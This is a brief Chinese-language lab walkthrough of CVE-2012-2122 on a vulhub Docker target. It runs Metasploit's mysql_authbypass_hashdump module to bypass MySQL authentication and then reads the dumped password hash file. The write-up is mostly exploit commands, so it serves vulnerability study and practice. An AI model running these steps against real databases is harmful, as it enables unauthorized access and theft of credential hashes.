一、基本信息
靶机:IP:192.168.100.40
二、攻击过程
进入 vulhub 靶场相关目录,并启动环境
cd master/mysql/CVE-2012-2122
docker-compose up -d
开启 msfconsole
msfconsole
使⽤ mysql_authbypass_hashdump 模块进⾏绕过授权下载密码哈希表
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.100.40
set THREADS 100
run
查看哈希表
cat /root/.msf4/loot/20240721224430_default_192.168.100.40_mysql.hashes_838828.txt